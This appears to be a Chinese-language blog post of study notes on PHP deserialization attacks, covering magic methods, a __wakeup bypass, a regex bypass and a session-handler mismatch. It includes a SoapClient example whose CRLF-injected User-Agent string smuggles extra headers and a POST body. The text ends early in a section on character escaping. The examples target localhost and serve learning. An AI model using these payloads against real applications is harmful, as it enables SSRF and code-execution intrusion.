<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha256-CTSx/A06dm1B063156EVh15m6Y67pAjZZaQc89LLSrU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"tearsjin.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.18.2","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="概述当unserialize()的参数可控时, 可以传入一个构造好的序列串控制类内部的变量甚至函数, 如果类内部存在比较危险的函数include() eval()等等, 将会造成严重后果 如何利用当服务端代码中存在某个类的时候, 可以通过unserialize()创建一个该类的对象, 而我们可控的就是类中的属性, 还可以利用一些技巧去绕过一些魔术方法或者是利用一些魔术方法. 通过控制魔术方法和属性">
<meta property="og:type" content="article">
<meta property="og:title" content="The learning of php unserialize">
<meta property="og:url" content="http://tearsjin.github.io/2021/03/23/The-learning-of-php-unserialize/index.html">
<meta property="og:site_name" content="K1rit0&#39;s Blog">
<meta property="og:description" content="概述当unserialize()的参数可控时, 可以传入一个构造好的序列串控制类内部的变量甚至函数, 如果类内部存在比较危险的函数include() eval()等等, 将会造成严重后果 如何利用当服务端代码中存在某个类的时候, 可以通过unserialize()创建一个该类的对象, 而我们可控的就是类中的属性, 还可以利用一些技巧去绕过一些魔术方法或者是利用一些魔术方法. 通过控制魔术方法和属性">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-03-23T06:20:24.000Z">
<meta property="article:modified_time" content="2022-09-11T02:28:38.000Z">
<meta property="article:author" content="K1rit0">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="Unserialize">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://tearsjin.github.io/2021/03/23/The-learning-of-php-unserialize/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://tearsjin.github.io/2021/03/23/The-learning-of-php-unserialize/","path":"2021/03/23/The-learning-of-php-unserialize/","title":"The learning of php unserialize"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>The learning of php unserialize | K1rit0's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<style>mjx-container[jax="SVG"] {
  direction: ltr;
}

mjx-container[jax="SVG"] > svg {
  overflow: visible;
}

mjx-container[jax="SVG"][display="true"] {
  display: block;
  text-align: center;
  margin: 1em 0;
}

mjx-container[jax="SVG"][justify="left"] {
  text-align: left;
}

mjx-container[jax="SVG"][justify="right"] {
  text-align: right;
}

g[data-mml-node="merror"] > g {
  fill: red;
  stroke: red;
}

g[data-mml-node="merror"] > rect[data-background] {
  fill: yellow;
  stroke: none;
}

g[data-mml-node="mtable"] > line[data-line] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > rect[data-frame] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > .mjx-dashed {
  stroke-dasharray: 140;
}

g[data-mml-node="mtable"] > .mjx-dotted {
  stroke-linecap: round;
  stroke-dasharray: 0,140;
}

g[data-mml-node="mtable"] > svg {
  overflow: visible;
}

[jax="SVG"] mjx-tool {
  display: inline-block;
  position: relative;
  width: 0;
  height: 0;
}

[jax="SVG"] mjx-tool > mjx-tip {
  position: absolute;
  top: 0;
  left: 0;
}

mjx-tool > mjx-tip {
  display: inline-block;
  padding: .2em;
  border: 1px solid #888;
  font-size: 70%;
  background-color: #F8F8F8;
  color: black;
  box-shadow: 2px 2px 5px #AAAAAA;
}

g[data-mml-node="maction"][data-toggle] {
  cursor: pointer;
}

mjx-status {
  display: block;
  position: fixed;
  left: 1em;
  bottom: 1em;
  min-width: 25%;
  padding: .2em .4em;
  border: 1px solid #888;
  font-size: 90%;
  background-color: #F8F8F8;
  color: black;
}

foreignObject[data-mjx-xml] {
  font-family: initial;
  line-height: normal;
  overflow: visible;
}

.MathJax path {
  stroke-width: 3;
}

mjx-container[display="true"] {
  overflow: auto hidden;
}

mjx-container[display="true"] + br {
  display: none;
}
</style><link rel="alternate" href="/atom.xml" title="K1rit0's Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">K1rit0's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description"> </p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>links</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A6%82%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">如何利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E8%88%AC%E6%B5%81%E7%A8%8B"><span class="nav-number">2.1.</span> <span class="nav-text">一般流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="nav-number">2.2.</span> <span class="nav-text">魔术方法</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%85%B3%E4%BA%8E%E7%BB%95%E8%BF%87%E7%9A%84Trick"><span class="nav-number">3.</span> <span class="nav-text">关于绕过的Trick</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87-wake"><span class="nav-number">3.1.</span> <span class="nav-text">绕过__wake()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F"><span class="nav-number">3.2.</span> <span class="nav-text">绕过正则表达式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%98%E9%87%8F%E5%BC%95%E7%94%A8"><span class="nav-number">3.3.</span> <span class="nav-text">变量引用</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#php%E5%8E%9F%E7%94%9F%E7%B1%BB%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">4.</span> <span class="nav-text">php原生类反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#SoapClient%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8"><span class="nav-number">4.1.</span> <span class="nav-text">SoapClient反序列化利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A6%82%E8%BF%B0-1"><span class="nav-number">4.1.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="nav-number">4.1.2.</span> <span class="nav-text">利用方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFCRLF"><span class="nav-number">4.1.2.1.</span> <span class="nav-text">什么是CRLF</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#php-session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">5.</span> <span class="nav-text">php-session反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A6%82%E8%BF%B0-2"><span class="nav-number">5.1.</span> <span class="nav-text">概述</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E4%BA%8Esession-upload-progress"><span class="nav-number">5.1.1.</span> <span class="nav-text">关于session.upload_progress</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E4%BA%8Esession-serialize-handler"><span class="nav-number">5.1.2.</span> <span class="nav-text">关于session.serialize_handler</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-1"><span class="nav-number">5.2.</span> <span class="nav-text">利用方法</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8"><span class="nav-number">6.</span> <span class="nav-text">反序列化字符逃逸</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9B%BF%E6%8D%A2%E5%90%8E%E5%AD%97%E7%AC%A6%E5%8F%98%E9%95%BF"><span class="nav-number">6.1.</span> <span class="nav-text">替换后字符变长</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="nav-number">7.</span> <span class="nav-text">参考文章</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="K1rit0"
      src="https://avatars.githubusercontent.com/u/56160386?s=96&v=4">
  <p class="site-author-name" itemprop="name">K1rit0</p>
  <div class="site-description" itemprop="description"> </div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">35</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/tearsjin" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;tearsjin" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:k1rit0@qq.com" title="E-Mail → mailto:k1rit0@qq.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://tearsjin.github.io/2021/03/23/The-learning-of-php-unserialize/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://avatars.githubusercontent.com/u/56160386?s=96&v=4">
      <meta itemprop="name" content="K1rit0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="K1rit0's Blog">
      <meta itemprop="description" content=" ">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="The learning of php unserialize | K1rit0's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          The learning of php unserialize
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2021-03-23 14:20:24" itemprop="dateCreated datePublished" datetime="2021-03-23T14:20:24+08:00">2021-03-23</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2022-09-11 10:28:38" itemprop="dateModified" datetime="2022-09-11T10:28:38+08:00">2022-09-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/WebSummary/" itemprop="url" rel="index"><span itemprop="name">WebSummary</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Word count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Word count in article: </span>
      <span>7.9k</span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>7 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>当<code>unserialize()</code>的参数可控时, 可以传入一个构造好的序列串控制类内部的变量甚至函数, 如果类内部存在比较危险的函数<code>include() eval()</code>等等, 将会造成严重后果</p>
<h1 id="如何利用"><a href="#如何利用" class="headerlink" title="如何利用"></a>如何利用</h1><p>当服务端代码中存在某个类的时候, 可以通过<code>unserialize()</code>创建一个该类的对象, 而我们可控的就是类中的属性, 还可以利用一些技巧去绕过一些魔术方法或者是利用一些魔术方法. 通过控制魔术方法和属性达到我们想要的攻击效果.</p>
<h2 id="一般流程"><a href="#一般流程" class="headerlink" title="一般流程"></a>一般流程</h2><ol>
<li><p>寻找参数可控的<code>unserialize()</code></p>
</li>
<li><p>寻找可以用于命令执行, 文件包含等等的函数在危险类</p>
</li>
<li>找到一个控制链控制危险类中的危险函数</li>
</ol>
<h2 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">__wakeup() //执行unserialize()时，先会调用这个函数</span><br><span class="line">__sleep() //执行serialize()时，先会调用这个函数</span><br><span class="line">__destruct() //对象被销毁时触发</span><br><span class="line">__call() //在对象上下文中调用不可访问的方法时触发</span><br><span class="line">__callStatic() //在静态上下文中调用不可访问的方法时触发</span><br><span class="line">__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法</span><br><span class="line">__set() //用于将数据写入不可访问的属性</span><br><span class="line">__isset() //在不可访问的属性上调用isset()或empty()触发</span><br><span class="line">__unset() //在不可访问的属性上使用unset()时触发</span><br><span class="line">__toString() //把类当作字符串使用时触发</span><br><span class="line">__invoke() //当尝试将对象调用为函数时触发</span><br></pre></td></tr></table></figure>
<p>需要注意的是, <code>__toString()</code>这个方法触发的方式比较多:</p>
<ol>
<li><code>echo ($obj) / print($obj)</code>打印时会触发</li>
<li>反序列化对象与字符串连接时</li>
<li>反序列化对象参与格式化字符串时</li>
<li>反序列化对象与字符串进行<code>==</code>比较时（<code>PHP</code>进行<code>==</code>比较的时候会转换参数类型）</li>
<li>反序列化对象参与格式化<code>SQL</code>语句，绑定参数时</li>
<li>反序列化对象在经过<code>php</code>字符串函数，如 <code>strlen()</code>、<code>addslashes()</code>时</li>
<li>在in_array()方法中，第一个参数是反序列化对象，第二个参数的数组中有<code>toString</code>返回的字符串的时候<code>toString</code>会被调用</li>
<li>反序列化的对象作为 class_exists() 的参数的时候</li>
</ol>
<h1 id="关于绕过的Trick"><a href="#关于绕过的Trick" class="headerlink" title="关于绕过的Trick"></a>关于绕过的Trick</h1><h2 id="绕过-wake"><a href="#绕过-wake" class="headerlink" title="绕过__wake()"></a>绕过__wake()</h2><blockquote>
<p>版本:<br>php 5&lt; 5.6.25<br>php 7&gt; 7.0.10</p>
</blockquote>
<p>利用方法:<strong>当序列化的字符串中的属性个数大于类中实际的属性个数时, 就会跳过__wake()函数</strong></p>
<h2 id="绕过正则表达式"><a href="#绕过正则表达式" class="headerlink" title="绕过正则表达式"></a>绕过正则表达式</h2><ol>
<li><p>加号绕过, 在反序列化的时候, 数字前面的加号会被当成是正号而正则匹配的时候则不会这样识别</p>
<p>比如说<code>O:4:"test":1:{s:1:"a";s:3:"abc";}</code>, 有时候题目会通过正则<code>O\:\d</code>来匹配<code>O:4</code>, 这时将序列改<br>成<code>O:+4:"test":1:{s:1:"a";s:3:"abc";}</code>就能绕过该匹配</p>
</li>
</ol>
<h2 id="变量引用"><a href="#变量引用" class="headerlink" title="变量引用"></a>变量引用</h2><p>利用变量引用使得类中两个变量始终相等</p>
<h1 id="php原生类反序列化"><a href="#php原生类反序列化" class="headerlink" title="php原生类反序列化"></a>php原生类反序列化</h1><h2 id="SoapClient反序列化利用"><a href="#SoapClient反序列化利用" class="headerlink" title="SoapClient反序列化利用"></a>SoapClient反序列化利用</h2><h3 id="概述-1"><a href="#概述-1" class="headerlink" title="概述"></a>概述</h3><p>php安装<code>php-soap</code>扩展之后, 可以反序列化原生类<code>SoapClient</code>, 来发送<code>http post</code>请求来实现<code>SSRF</code><br>通过反序列化<code>SoapClient</code>对象后调用不存在的方法触发<code>__call()</code>方法<br>这个<code>__call()</code>方法会向指定<code>URL</code>发送<code>HTTP POST</code>请求, 因为<code>User-Agent</code>字段可控, 所以可以通过<code>CRLF</code>来构造请求头实现自定义<code>POST DATA</code></p>
<p>如果要在自己的环境复现则需要更改<code>php.ini</code>中的<code>extension=soap</code></p>
<h3 id="利用方法"><a href="#利用方法" class="headerlink" title="利用方法"></a>利用方法</h3><p>举个栗子</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$target</span> = <span class="string">"http://127.0.0.1/test.php"</span>;</span><br><span class="line">	<span class="variable">$ua</span> = <span class="string">"kirito-zbds"</span>;</span><br><span class="line">    <span class="variable">$a</span> = <span class="keyword">new</span> SoapClient(<span class="literal">NULL</span>,<span class="keyword">array</span>(<span class="string">'location'</span>=&gt;<span class="variable">$target</span>,<span class="string">'uri'</span>=&gt;<span class="string">'k1rit0'</span>,<span class="string">'user_agent'</span>=&gt;<span class="variable">$ua</span>));</span><br><span class="line">    <span class="variable">$b</span> = serialize(<span class="variable">$a</span>);</span><br><span class="line">	<span class="variable">$c</span> = unserialize(<span class="variable">$b</span>);</span><br><span class="line">	<span class="variable">$c</span> -&gt; tan90_function();</span><br></pre></td></tr></table></figure>
<p>当<code>SoapClient</code>对象被逆序列化出来并调用一个不存在的<code>tan90_function()</code>方法时.<code>__call()</code>方法会向<code>location</code>也就是<code>http://127.0.0.1/test.php</code>发送一个<code>HTTP POST</code>请求, 而请求头中会有:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">User-Agent: kirito-zbds</span><br><span class="line">SOAPAction: k1rit0#tan90_function()    // uri + 被调用的不存在的函数名</span><br></pre></td></tr></table></figure>
<p>可以看到, 请求头中的这些字段会变成可控的, 但这样只能通过内网访问<code>test.php</code>, 并不能任意<code>POST</code>数据. 要想<code>POST</code>数据, 就要用到<code>CRLF</code>了.</p>
<h4 id="什么是CRLF"><a href="#什么是CRLF" class="headerlink" title="什么是CRLF"></a>什么是CRLF</h4><p><code>CRLF</code>就是<code>\r\n</code>的缩写, <code>HTTP</code>协议中<code>header</code>之间是用一个<code>\r\n</code>来分隔的, 而<code>HTTP header</code>和<code>HTTP body</code>之间是用<code>\r\n\r\n</code>也就是两个<code>\r\n</code>来分割的. 如果请求头中的字段可控, 那么可以手动添加<code>\r\n</code>用以在请求中添加字段甚至是添加<code>HTTP body</code>用以<code>POST data</code>. </p>
<p>比如在上面的例子中, 我们把<code>$ua</code>改为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$ua</span> = <span class="string">"kirito-zbds\r\nContent-Type:application-www-form-urlencoded\r\nContent-Length:17\r\n\r\ndata=this_is_data"</span></span><br></pre></td></tr></table></figure>
<p>那么<code>HTTP POST</code>的请求头中就会出现这么一串</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">User-Agent: kirito-zbds</span><br><span class="line">Content-Type: application-www-form-urlencoded</span><br><span class="line">Content-Length: 17</span><br><span class="line"></span><br><span class="line">data=this_is_data</span><br><span class="line">SOAPAction: k1rit0#tan90_function()</span><br></pre></td></tr></table></figure>
<p>这样就成功伪造出<code>HTTP POST</code>请求并传输参数了</p>
<h1 id="php-session反序列化"><a href="#php-session反序列化" class="headerlink" title="php-session反序列化"></a>php-session反序列化</h1><p>又是<code>session</code>, 上次在文件包含也有<code>session</code>, 其实这里的反序列化也要用到那边的知识</p>
<h2 id="概述-2"><a href="#概述-2" class="headerlink" title="概述"></a>概述</h2><h3 id="关于session-upload-progress"><a href="#关于session-upload-progress" class="headerlink" title="关于session.upload_progress"></a>关于<code>session.upload_progress</code></h3><p>这个<code>php-session</code>反序列化其实跟<code>session.uplaod_progress</code>有关, 详细的可以看文件包含那部分的笔记<br>这里只简单的说一下, 服务端的<code>php.ini</code>默认配置<code>session.use_strict_mode = 0</code>, 这样用户可以自己设置<br><code>Cookies: PHPSESSID = xxxxxx</code>, 服务端将会创建一个<code>/tmp/sess_xxxxxx</code>文件</p>
<p>并且, 如果用户向服务端传送文件, 那么服务端将会在<code>/tmp/sess_xxxxxx</code>中写入上传进度, 最重要的是. 如果用户的<br><code>POST DATA</code>中含有<code>PHP_SESSION_UPLOAD_PROGRESS=xxx</code>, 那么服务端将会在<code>/tmp/sess_xxxxxx</code>中写入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload_progress_xxx | 上传进度</span><br></pre></td></tr></table></figure>
<h3 id="关于session-serialize-handler"><a href="#关于session-serialize-handler" class="headerlink" title="关于session.serialize_handler"></a>关于<code>session.serialize_handler</code></h3><p>在执行<code>php</code>代码时可以设置这么两个东西</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ini_set(<span class="string">'session.serialize_handler'</span>,<span class="string">'php_serialize'</span>);</span><br><span class="line">ini_set(<span class="string">'session.serialize_handler'</span>,<span class="string">'php'</span>);</span><br></pre></td></tr></table></figure>
<p>这里设置的是php处理<code>session</code>的方式,<code>php</code>或<code>php_serialize</code>. 默认是<code>php</code><br>这两个方式的不同就在于, 存取<code>session</code>文件的格式不同.<br>下面从一个例子来详细的看一下这两个方式的区别</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">ini_set(<span class="string">'session.serialize_handler'</span>, <span class="string">'php'</span>);</span><br><span class="line"><span class="comment">// ini_set('session.serialize_handler','php_serialize');</span></span><br><span class="line">session_start();</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'k1rit0'</span>] = <span class="variable">$_GET</span>[<span class="string">'a'</span>];</span><br><span class="line">var_dump(<span class="variable">$_SESSION</span>);</span><br></pre></td></tr></table></figure>
<p><code>php</code>方式的存取的格式是:<code>键名|serialize_string</code>, 当我传<code>?a=a:2:{s:4:"name";s:6:"kirito";s:3:"age";i:14;}</code><br><code>session</code>文件中存的是<code>k1rit0|s:45:"a:2:{s:4:"name";s:6:"kirito";s:3:"age";i:14;}";</code></p>
<p>而如果用的是<code>php_serialize</code>方式,存取的格式就是<code>serialize_string</code>, <code>session</code>文件中存的便是<br><code>a:1:{s:6:"k1rit0";s:45:"a:2:{s:4:"name";s:6:"kirito";s:3:"age";i:14;}";}</code></p>
<h2 id="利用方法-1"><a href="#利用方法-1" class="headerlink" title="利用方法"></a>利用方法</h2><p>根据上面的两个<code>session</code>存取方法, 如果我们先以<code>php_serialize</code>储存 再按<code>php</code>的方式读取, 就可以反序列化一些恶意的序列. 就拿上面的例子来说, 先以<code>php_serialize</code>储存<code>?a=|a:2:{s:4:"name";s:6:"kirito";s:3:"age";i:14;}</code>,注意那个<code>|</code></p>
<p>这个时候来看看<code>session</code>里是啥</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:1:{s:6:"k1rit0";s:46:"|a:2:{s:4:"name";s:6:"kirito";s:3:"age";i:14;}";}</span><br></pre></td></tr></table></figure>
<p>如果这个时候, 按<code>php</code>的方式读取这个<code>session</code>文件, 就会被识别成两部分:</p>
<ol>
<li><code>|</code>前面的<code>a:1:{s:6:"k1rit0";s:46:"</code></li>
<li><p><code>|</code>后面的<code>a:2:{s:4:"name";s:6:"kirito";s:3:"age";i:14;}";}</code></p>
<p><code>|</code>后面的前一部分<code>`a:2:{s:4:"name";s:6:"kirito";s:3:"age";i:14;}</code>, 会被识别成一个完整的序列化串</p>
</li>
</ol>
<blockquote>
<p>这里有个session_start()的小知识, 如果php代码中存在session_start()而且处理session的方式是php, 那么在执行<br>session_start()时会反序列化session中<code>|</code>后的序列化串, 并赋值给$_SESSION变量</p>
</blockquote>
<p>如果<code>php</code>代码中某些类中有<code>__wake()</code>或<code>__destruct()</code>, 并且这两个魔法函数中存在危险的函数, 则可以通过<code>session</code>反序列化控制这些危险函数.</p>
<p>至于如何在<code>session</code>文件中写入恶意序列化串呢? 那就要用到<code>session.upload_progress</code>中的<br><code>PHP_SESSION_UPLOAD_PROGRESS</code>了, 具体怎么用, 去看文件包含那篇笔记吧</p>
<h1 id="反序列化字符逃逸"><a href="#反序列化字符逃逸" class="headerlink" title="反序列化字符逃逸"></a>反序列化字符逃逸</h1><p>如果存在对序列化后的字符进行替换, 并且替换后字符长度会变, 则有可能存在字符逃逸</p>
